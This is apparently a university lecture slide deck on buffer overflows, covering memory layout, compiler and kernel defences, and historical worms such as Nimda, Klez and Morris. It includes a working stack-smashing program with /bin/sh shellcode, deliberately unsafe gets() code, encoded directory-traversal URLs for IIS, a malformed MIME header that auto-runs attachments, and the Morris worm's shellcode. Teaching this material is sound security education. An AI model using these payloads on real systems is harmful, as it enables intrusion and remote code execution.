540 likes | 631 Views
Buffer Overflow 2. CSE 825. Memory Model. Unix memory Text/Data, generate by compiler BSS - Block Started by Symbol, static variables Heap, run-time dynamic allocated. Stack, local variables, argument, etc. Windows (Similar). #include <stdio.h> int main(char argc,char *argv[]) {
E N D
Buffer Overflow 2 CSE 825
Memory Model • Unix memory • Text/Data, generate by compiler • BSS - Block Started by Symbol, static variables • Heap, run-time dynamic allocated. • Stack, local variables, argument, etc. • Windows (Similar) Michigan State University Computer Science and Engineering
#include <stdio.h> int main(char argc,char *argv[]) { int age; char name[8]; char tmp[20]; printf("Enter your age:"); gets(tmp); age=atoi(tmp); printf("Enter your name:"); gets(name); printf("-----------\n%s is %d years old\n",name,age); } $./a.out Enter your age:15 Enter your name:Simplexx0 ----------- Simplexx0 is 48 years old Simple Buffer Overflow Attacks Michigan State University Computer Science and Engineering
Return Address Attacks char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0" "\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; int main(int argc, char *argv[]) { char buffer[96]; int i; long *long_ptr; long_ptr=(long *) large_string; /* fill large_string with address of buffer*/ for (i=0;i<32;i++) *(long_ptr+i)=(int) buffer; /* place shell code at the beginning of buffer */ for(i=0;i<strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); } • Stack Overflow, Stack Smashing Michigan State University Computer Science and Engineering
Frame Pointer Attacks Michigan State University Computer Science and Engineering
Function Pointers Attacks int test() { printf("This is test function\n"); } int test1() { printf("This is test1 function\n"); } int main(int argc,char *argv[]) { int (*f_ptr) (); char buff[5]; f_ptr=&test; gets(buff); f_ptr(); } Michigan State University Computer Science and Engineering
Real Attack • Two mandatory conditions • Injecting malicious code/data • Redirect program to execute malicious/data • Target at root privileges (or set uid). Michigan State University Computer Science and Engineering
Prevention tools Classification • Static Analysis • Specification, Lexical Analyzer, Parser… • Compiler-injected protection code • Prologue and Epilogue code … • Software Architecture Support • Kernel patch, Library … • Hardware Architecture Support • Semantic Modification, New Instruction … Programmer (High) (Low) Hardware Michigan State University Computer Science and Engineering
Language Specification (Handle string as ADT. i.e. Java, BASIC, CCured etc.) Lexical scanner /tmp/ccsiiEG4.o: In function `main': /tmp/ccsiiEG4.o(.text+0x2e): the `gets' function is dangerous and should not be used. Parser, more precise detail. Pros: Prevent the problem before deploying the software. Cons: Only applied to known problems. No run-time info. False alarms. Require programmers’ skill Static Analysis Tools Michigan State University Computer Science and Engineering
Array Bounds Checking • Enhanced Pointer (base, pointer, limit) • Compatibility problem • Handle pointer as ADT • Symbol table by [Jones & Kelly, Imperial] • Backward Compatible • More than 30x to 100x penalty • Etc. gcc –fbound-checks –fbounded-pointers char *a; char b[10]; *a = &b; b[11]=10; for (a=b;a<&b[10];a++) *a=‘0’; Figure from Richard W. M. Jones and Paul H. J. Kelly, “Backwards-Compatible Bounds Checking for Arrays and Pointers in C Programs,” Automated and Algorithmic Debugging,1997, pages 13-26 Michigan State University Computer Science and Engineering
Non-executable Stack • Patch the kernel • Heap Overflow ? • Legal use of executable stack ? • Linus says “No” By SolarDesigner Michigan State University Computer Science and Engineering
StackGuard • Random canary • Terminator canary(“null” is difficult to have in the middle of a buffer) Figure from “StackGuard: Defending Programs Against Stack Smashing Attacks,” Poster Presentation from http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ By Oregon Graduate Institute (Immunix) Michigan State University Computer Science and Engineering
IBM ProPolice • Original Code int bar() { void (* funct2)(); char buff[80]; • Reorder Code int bar() { char buff[80]; void (* funct2)(); • Guard Value (Similar to StackGuard) • Declare pointers after buffer. • Pointer in Structure ? Figure from J. Etoh., “GCC extension for protecting applications from stack-smashing attacks,” http://www.trl.ibm.com/projects/security/ssp/ , June 2000 By IBM Research, Japan Michigan State University Computer Science and Engineering
StackShield • Save redundant copy of return address • Copy the return address from the redundant copy back to original stack • Check the return address with the redundant copy • Force the code to be in text section • Legal use of executing code in heap ? • LISP, Object-Oriented program By Oregon Graduate Institute (Immunix) Michigan State University Computer Science and Engineering
StackGhost • Sparc Architecture Register Window • Save return address to register. • OpenBSD Implementation Figure from J. Etoh., “GCC extension for protecting applications from stack-smashing attacks,” http://www.trl.ibm.com/projects/security/ssp/ , June 2000 By Purdue Michigan State University Computer Science and Engineering
PointGuard • Encrypt the pointer for storing, decrypt for dereferring • Compatibility ? • Initialization ? • Performance ? • Encryption Algorithm ? By Oregon Graduate Institute (Immunix) Michigan State University Computer Science and Engineering
Libsafe • Load the libsafe library before standard library • Intercept vulnerable calls (wrapper) • How about others ? Figure from Arash Baratloo, et al. ., Transparent Run-Time Defense Against Stack Smashing,” Proceedings of the Usenix Annual Technical Conference 2000 By Bell-Labs Michigan State University Computer Science and Engineering
Libverify • Binary rewrite & inject protection code • Wrapper around call/return with separate canary stack • Problem • Absolute jump/call • Double space ? Figure from Arash Baratloo, et al. ., Transparent Run-Time Defense Against Stack Smashing,” Proceedings of the Usenix Annual Technical Conference 2000 By Bell-Labs Michigan State University Computer Science and Engineering
Split Stack • Separate Control and Data Stack By UIUC Michigan State University Computer Science and Engineering
Address Obfuscation • Randomize the base address of the memory segment • Permute the order of variables/routines • Random gaps between object • Problem: Fragmentation, compatibility ? • Similar method: PAX’s ASLR (Address Space Layout Randomization) By Stony Brook U., NY. Michigan State University Computer Science and Engineering
Attacks Let’s go through some old attacks • based on not checking input • Nimda • Klez • Buffer overflow • Morris Michigan State University Computer Science and Engineering
Input Validation Input validation exploits take advantage of programs that do not properly validate user-supplied data. For example, a web page form that asks for an email address and other personal information should validate that the email address is in the proper form, and in addition, does not contain special escape or reserved characters. However, many applications such as Web servers and email clients do not properly validate input; this allows hackers to inject specially crafted input that causes the application to perform in an unexpected manner. While there are many types of input validation vulnerabilities, URL canonicalization and MIME header parsing are specifically discussed here due to their widespread usage in recent blended attacks. Michigan State University Computer Science and Engineering
Canonicalization is when a resource can be represented in more than one manner. Canonicalization of URLs occurs where http://doman.tld/user/foo.gif and http://domain.tld/user/bar/../foo.gif represent the same file. A URL canonicalization vulnerability results when a security decision is based on the URL and all of the URL representations are not taken into account. For example, a web server may allow access only to the /user and sub-directories by examining the URL for the string /user immediately after the domain name. For example, the URL http://domain.tld/user/../../autoexec.bat would pass the security check, but actually provide access to the root directory. After more widespread exposure of URL canonicalization issues due to such an issue in Microsoft Internet Information Server, many applications added security checks for the doubledot string “..” in the URL. However, canonicalization attacks were still possible due to encoding. Michigan State University Computer Science and Engineering
Nimda Michigan State University Computer Science and Engineering
Unicode Unicode has been developed to describe all possible characters of all languages plus a lot of symbols with one unique number for each character/symbol. Unicode as defined by the Unicode organization has become a universal standard: ISO/IEC 10646, describing the 'Universal Multiple-Octet Coded Character Set' (UCS). It is not always possible to transfer a Unicode character to another computer reliably. For that reason a special encoding scheme has been developed, UTF-8, which stands for UCS Transformation Format 8. Michigan State University Computer Science and Engineering
For example, Microsoft IIS supports UTF-8 encoding such that %2F represents a forward slash “/”. UTF-8 translates US-ASCII characters (7 bits) to a single octet (8 bits) and other characters to multi-octets. Translation occurs as follows: 0-7 bits 0xxxxxxx 8-11 bits 110xxxxx 10xxxxxx 12-16 bits 1110xxxx 10xxxxxx 10xxxxxx 17-21 bits 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx For example, a slash (0x2F, 0101111) would be 00101111 in UTF-8. A character with the hexadecimal representation of 0x10A (binary 100001010) has 9-bits and thus, a UTF-8 representation of 11000100 10001010. Michigan State University Computer Science and Engineering
While standard encoding did not defeat the aforementioned input validation security checks, interestingly, Microsoft IIS still provides decoding, if one encodes a 7-bit character using the 8-11 bit rule format. For example, a slash (0x2F, 0101111) in 8-11 bit UTF-8 encoding would be 11000000 10101111 (hexadecimal 0xC0 0xAF). Thus, instead of using the URL, http://domain.tld/user/../../ autoexec.bat one could substitute the slash with the improper UTF representation http://domain.tld/user/..%co%af../autoexec.bat. The input validation allowed this URL since it did not recognize the UTF-8 encoded forward slash, which gave access outside the web root directory. Microsoft fixed this vulnerability. Michigan State University Computer Science and Engineering
In addition, Microsoft IIS performs UTF-8 decoding on two separate occasions. This allows characters to be double-encoded. For example, a backslash (0x5C) can be represented as %5C. However, one can also encode the percent-sign (0x25), itself. Thus, %5C can be encoded as %255c. On the first decoding pass, %255c is decoded to %5c and on the second decoding pass %5C is then decoded to a backslash. Thus, URL http://domain.tld/user/..%5c../autoexec.bat will not pass the input validation check, but http://domain.tld/user/..%255c../autoexec.bat would pass, allowing access outside the web root directory. Microsoft fixed this vulnerability Michigan State University Computer Science and Engineering
Nimda The inability of webservers to properly provide input validation can then lead to attacks. For example, in IIS, one can utilize the encoding vulnerabilities to break out of the web root directory and execute cmd.exe from the Windows system directory, allowing remote execution. Nimda utilized such an attack to copy itself to the remote webserver and then execute itself. Michigan State University Computer Science and Engineering
Klez Michigan State University Computer Science and Engineering
MIME HEADER PARSING When Internet Explorer parses a file, the file can contain embedded MIME encoded files. Handling of these files occurs by examining a header, which defines the MIME type. Using a lookup table, these MIME types are associated with a local application. For example, the MIME type audio/basic is generally associated with Windows Media Player. Thus, MIME-encoded files designated as audio/basic will be passed to Windows Media Player. MIME types are defined by a Content-Type header. In addition to the associated application, each type has a variety of associated settings including the icon, whether to show the extension, and whether to automatically pass the file to the associated application when the file is being downloaded. Michigan State University Computer Science and Engineering
Outlook calls IE When receiving an HTML email with Microsoft Outlook and some other email clients, code within IE actually renders the e-mail. If the e-mail contains a MIME embedded file, IE would parse the email and attempt to handle the embedded MIME file. Vulnerable versions of IE would check whether the application should automatically be opened (passed to the associated application without prompting) by examining the Content-Type header. For example, audio/x-wav files are automatically passed to Windows Media Player for playing. However, a bug exists in vulnerable versions of IE where files can be passed to the incorrect application. Michigan State University Computer Science and Engineering
Email Worm: Klez Content-Type: audio/x-wav; name=”foobar.exe” Content-Transfer-Encoding: base64 Content-ID: <CID> In this case, IE determines the file should be automatically passed to the associated application (no prompting) since the content type is audio/x-wav. Since it is audio, that should be safe. However, when determining what the associated application is, instead of utilizing the Content-Type header IE incorrectly relies on a default association according to the extension .EXE so it is passed to the operating system for execution instead. Such a bug allows for the automatic execution of arbitrary code. Several Win32 mass mailers send themselves via an email with a MIME encoded malicious executable with a malformed header, and the executable will silently execute unbeknownst to the user. This occurs whenever IE parses the mail and thus can happen when simply reading or previewing email. Thus, email worms can spread themselves without any user actually executing or detaching a file. Badtrans and Klez executed themselves upon reading or previewing an infected email. Michigan State University Computer Science and Engineering
APPLICATION RIGHTS VERIFICATION While improper input validation may give applications increased access such as with URL canonicalization, other models simply give applications increased rights due to improper designation of code as safe. Such a design is employed by ActiveX and as a result numerous blended attacks have also used ActiveX control rights verification exploits. Michigan State University Computer Science and Engineering
“Safe for Scripting” ActiveX Controls By design, ActiveX controls are scriptable. They expose a set of methods and properties that can potentially be invoked in an unforeseen and malicious manner often via Internet Explorer. The security framework for ActiveX controls requires the developer to determine if their ActiveX control could potentially be used in a malicious manner. If a developer determines their control is safe, they may mark the control “safe for scripting.” Microsoft notes that ActiveX controls that have any of the following characteristics must not be marked safe for scripting. • Accessing information about the local computer or user. • Exposing private information on the local computer or network. • Modifying or destroying information on the local computer or net. • Faulting of the control and potentially crashing the browser. • Consuming excessive time or resources such as memory. • Executing potentially damaging system calls • Using the control in a deceptive manner However, despite these simple guidelines some ActiveX controls with these characteristics have been marked safe for scripting, and thus, have been used maliciously. Michigan State University Computer Science and Engineering
Bubbleboy For example, VBS/Bubbleboy used the Scriptlet.Typelib ActiveX control to write out a file to the Windows Startup directory. The Scriplet.Typelib contained properties to define the path and contents of the file. Because this ActiveX control was incorrectly marked safe for scripting, one could invoke a method to write a local file via a remote webpage or HTML email without triggering any ActiveX warning dialog. Michigan State University Computer Science and Engineering
ActiveX controls that have been marked safe for scripting can be easily determined by examining the registry. If the safe-for-scripting CLSID key exists under the Implemented Categories key for the ActiveX control, the ActiveX control is marked safe for scripting. Michigan State University Computer Science and Engineering
Clearly, leaving such security decisions to the developer is far from foolproof. Michigan State University Computer Science and Engineering
SYSTEM MODIFICATION Once malicious software gains access to the system, the system is often modified to disable application or user rights verification. Such modifications can be as simple as eliminating a root password or modifying the kernel allowing user rights elevation or previously unauthorized access. For example, CodeRed creates virtual webroots allowing general access to the compromised Web server, and Bolzano patches the kernel disabling user rights verification on Windows NT systems. Michigan State University Computer Science and Engineering
NETWORK ENUMERATION Several 32-bit computer viruses enumerate the Windows networks using standard Win32 browsing APIs such as WNetOpenEnum(), WNetEnumResourceA() of MPR.DLL. The first use of this attack appeared in the ExploreZip. Michigan State University Computer Science and Engineering
The Win32/Funlove virus was the first file infector to infect files on network shares using network enumeration. Win32/FunLove caused major headache by infecting large corporate networks world wide. This is because the network-aware nature of the virus. Many people often share directories without any security restrictions in place. Most people share more directories (such as a drive C:) than they need to and often without any passwords. This enhances the effectiveness of network-aware viruses. Michigan State University Computer Science and Engineering
Some viruses such as Win32/HLLW.Bymer use the form \\nnn.nnn.nnn.nnn\c\windows\ (where nnn-s describe an IP address) to access the C: drive of any remote systems that have a Windows folder on it. Such an attack can be particularly painful for many home users running a home PC that is typically not behind a firewall. Windows makes the sharing of network resources very simple – previously on by default, but since SP2 sharing is off by default. Michigan State University Computer Science and Engineering
Morris Worm The Morris worm implemented a buffer overflow attack against the fingerd program. This program runs as a system background process and satisfies requests based on the finger protocol on the finger port (79 decimal). The problem in fingerd was related to its use of the gets() library function. The gets() function contained an exploitable vulnerability. Michigan State University Computer Science and Engineering
Buffer Overflow Because fingerd declared a 512 byte buffer for gets() call without any bounds checking, it was possible to exploit this and send a larger string to fingerd. The Morris worm crafted a 536 byte “string” containing assembly code (shell code) on the stack of the remote system to execute a new shell via a modified return address. First the 536 byte buffer was initialized with zeros, filled with data and sent over to the machine to be attacked, followed by “\n” to indicate the end of the string for gets(). Michigan State University Computer Science and Engineering
When finger for a remote user is issued, a client-server connection is established. Client follows this sequence: 1. Sends user name (e.g. pete) to server. 2. Waits for user info from server. 3. When user info received, closes connection. Server (fingerd) follows this sequence: 1. Waits for user name from client. 2. When user name received, stores it into a 512-byte buffer 3. Runs its finger program to get user info 4. Sends user info back to the client 5. Closes connection Michigan State University Computer Science and Engineering
Here’s what Morris’ worm did: • Issued a finger command to a remote machine. • Instead of sending user name, it sent a 536-byte string to overflow the server’s 512-byte buffer. • The string was crafted so the overflow ran the shell, sh. • Because the client-server connection was still active, sh expected to get its input from that connection instead of from a keyboard. • The client (worm) issued the necessary commands to transmit the worm files to the server machine then run the worm on that machine. Self-propagation! Michigan State University Computer Science and Engineering
Morris Fingerd A connection was established to the remote finger server daemon and then a specially constructed string of 536 bytes was passed to the daemon, overflowing its input buffer and overwriting parts of the stack. For standard 4 BSD versions running on VAX computers, the overflow resulted in the return stack frame for the main routine being changed so that the return address pointed into the buffer on the stack. Michigan State University Computer Science and Engineering
Actual instructions for the attack on the stack: DD8F2F736800 pushl $68732f ; “/sh\0” DD8F2F62696E pushl $6e69622f ; “/bin” D05E5A movl sp, r10 ; save pointer to command DD00 pushl $0 ; third parameter DD00 pushl $0 ; second parameter DD5A pushl r10 ; push address of “/bin/sh\0” DD03 pushl $3 ; number of arguments for chmk D05E5C movl sp, ap ; Argument Pointer register = stack pointer BC3B chmk $3b ; change-mode-to-kernel The above code is an execve(“/bin/sh”, 0, 0) system call. Michigan State University Computer Science and Engineering
Shell code is always crafted to be as short as possible. In the case of the Morris worm, the shell code is 28 bytes. Shell code often needs to fit in small buffers to exploit the maximum set of vulnerable applications. Michigan State University Computer Science and Engineering
Bytes 0 through 399 of the attack buffer were filled with the 01 opcode (NOP). An additional set of longword-s were also changed beyond the original buffer size, which in turn smashed the stack with a new return address to point into the buffer and eventually hit the shell code within it. When the attack worked the new shell took over the process and the worm could successfully send new commands to the system via the open network connection. Michigan State University Computer Science and Engineering